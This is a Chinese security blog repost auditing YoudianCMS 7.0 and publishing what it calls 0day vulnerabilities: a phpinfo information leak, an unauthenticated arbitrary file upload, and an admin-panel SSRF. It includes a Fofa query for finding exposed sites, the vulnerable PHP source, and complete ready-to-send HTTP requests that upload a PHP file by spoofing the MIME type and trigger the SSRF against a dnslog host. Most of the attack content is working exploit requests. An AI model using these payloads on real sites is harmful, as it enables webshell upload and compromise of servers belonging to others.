YoudianCMS 7.0 审计(0day)

admin 2023年12月8日05:00:28评论70 views字数 5401阅读18分0秒阅读模式

Fofa:app="友点建站-CMS"

0x01 前台信息泄露

访问 /t.php|/upload/t.php 泄露了网站根目录等信息.

YoudianCMS 7.0 审计(0day)

/t.php?action=phpinfo //调出PHPinfo

YoudianCMS 7.0 审计(0day)

0x02 前台任意文件上传

YoudianCMS 7.0 审计(0day)

<?php define ( 'IN_BAMBOO', true ); // 取得根目录define ( 'ROOT_PATH', '../../../../' );  // back to your root path
$arrType = array ( 'image/jpg', 'image/gif', 'image/png', 'image/bmp', 'image/pjpeg', 'image/jpeg' );$max_size = 500 * 1024; // 最大文件限制(单位:byte)$upfile = ROOT_PATH.'image/uploads'; // 图片目录路径if (!isset($_FILES ['files'])){ echo '{"result":"400","msg":"未能找到图片,请确认图片是否过大"}'; exit ();}$file = $_FILES ['files'];
if ($_SERVER ['REQUEST_METHOD'] == 'POST') { // 判断提交方式是否为POST if (! is_uploaded_file ( $file ['tmp_name'] )) { // 判断上传文件是否存在 echo '{"result":"400","msg":"图片不存在"}'; exit (); } if ($file ['size'] > $max_size) { // 判断文件大小是否大于500000字节 echo '{"result":"400","msg":"上传图片太大,最大支持:'.($max_size/1024).'KB"}'; exit (); } if (! in_array ( $file ['type'], $arrType )) { // 判断图片文件的格式 echo '{"result":"400","msg":"上传图片格式不对"}'; exit (); } if (! file_exists ( $upfile )) { // 判断存放文件目录是否存在 mkdir ( $upfile, 0755, true ); } $imageSize = getimagesize ( $file ['tmp_name'] ); $img = $imageSize [0] . '*' . $imageSize [1]; $fname = $file ['name']; $ftype = explode ( '.', $fname ); $time = explode ( " ", microtime () ); $time = $time [1] . ($time [0] * 1000); $time2 = explode ( ".", $time ); $time = $time2 [0]; $returnName=$time."." .end($ftype); $picName = $upfile . "/" . $returnName ; if (! move_uploaded_file ( $file ['tmp_name'], $picName )) { echo '{"result":"400","msg":"从:'.$file ['tmp_name'].'移动图片到:'.$picName.'出错"}'; exit (); } else { echo '{"result":"200","imgurl":"image/uploads/' . $returnName . '"}'; }}
?>

发现并未有鉴权 只需绕过MIME头即可上传php文件.

YoudianCMS 7.0 审计(0day)

POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1Host: x.x.x.xContent-Length: 202Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundarydAPjrmyKewWuf59HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.3611Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8Connection: close
------WebKitFormBoundarydAPjrmyKewWuf59HContent-Disposition: form-data; name="files"; filename="c1.php"Content-Type: image/jpg
<?php phpinfo();?>------WebKitFormBoundarydAPjrmyKewWuf59H--

实际上传到/public/image/uploads 目录下.

YoudianCMS 7.0 审计(0day)

0x03 后台SSRF漏洞

问题出自 /App/Core/Extend/Function/ydLib.php 使用了curl_exec函数去访问$url变量.

function yd_curl_get($url, $data=false, $timeout = 5, $options=array() ){  //http_build_query(array('foo'=>'bar','baz'=>'boom')); 输出:foo=bar&baz=boom  if(!empty($data)){    $url .= '?'.http_build_query($data);  }  if( function_exists('curl_init') ){    $ch = curl_init( $url );    //症状:php curl调用https出错 排查方法:在命令行中使用curl调用试试。    //原因:服务器所在机房无法验证SSL证书。解决办法:跳过SSL证书检查。    //不加上CURLOPT_SSL_VERIFYPEER,curl_exec总是返回false    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);    curl_setopt($ch, CURLOPT_HEADER, false);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);    //curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR:220.181.136.242', 'CLIENT-IP:220.181.136.242'));    //CURLOPT_REFERER、CURLOPT_USERAGENT    foreach ($options as $k=>$v){      $k = is_numeric($k) ? $k : constant($k);      curl_setopt($ch, $k, $v);    }    $res = curl_exec($ch);    curl_close($ch);  }else{    //利用了stream_context_create()设置超时时间:    //当读取https协议时,需要服务器支持open_ssl模块    $opts = array( 'http' => array('timeout' => $timeout, 'method'=>"GET", 'header'=>'') );    if( $options['CURLOPT_REFERER']){      $opts['header'] .= "Referer:".$options['CURLOPT_REFERER']."rn";    }    if( $options['CURLOPT_USERAGENT']){      $opts['header'] .= "User-Agent:".$options['CURLOPT_USERAGENT']."rn";    }    $context = stream_context_create( $opts );    $res = @file_get_contents( $url, false, $context );  }  return $res;}

全局搜索调用yd_curl_get函数的文件.

YoudianCMS 7.0 审计(0day)

发现有两处代码调用了此函数.

/App/Lib/Action/Admin/CollectAction.class.php

private function _collectContent($url, $regex, $replace = false, $options = array()){    if (empty($url) || (strlen($url) < 10)) {      $errmsg = "URL地址无效";      return $errmsg;    }
$this->_sleep($options["TimeTnterval"]); set_time_limit(200); $options["Url"] = $url; $httpHeader = $this->_getOptions($options); $content = yd_curl_get($url, false, 30, $httpHeader); $content = $this->ToUtf8($content, $options["Charset"]); ......

寻找调用此函数方法的文件.

YoudianCMS 7.0 审计(0day)

最终找到调用口 /App/Lib/Action/Admin/CollectAction.class.php

public function testField(){    header("Content-Type:text/html; charset=utf-8");    $url = trim($_POST["TestDetailUrl"]);
if (empty($url)) { if (empty($_POST["DetailUrlRegex"])) { $url = $_POST["ListUrl"]; } else { $result = $this->_collectList($_POST);
if (is_array($result)) { $index = rand(0, count($result) - 1); $url = $result[$index]; } else { $this->ajaxReturn($result, "", 0); } } }
$data = $this->_collectContent($url, $_POST["FieldInfo"], $_POST["ReplacePara"], $_POST);
if (is_array($data)) { $this->ajaxReturn($data, $url, 1); } else { $this->ajaxReturn($data, $url, 0); } }

Payload:

POST /index.php/Admin/Collect/testField HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8Cache-Control: max-age=0Connection: keep-aliveContent-Length: 30Content-Type: application/x-www-form-urlencodedCookie: ZDEDebuggerPresent=php,phtml,php3; PHPSESSID=54nua73v65g7fkbdfmk5t1iru4; CKFinder_Path=Images%3A%2F%3A1; youdianAdminLangSet=cn; youdianMenuTopID=1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36
TestDetailUrl=xxx.dnslog.cn

YoudianCMS 7.0 审计(0day)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):YoudianCMS 7.0 审计(0day)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月8日05:00:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   YoudianCMS 7.0 审计(0day)https://cn-sec.com/archives/2278179.html

发表评论

匿名网友 填写信息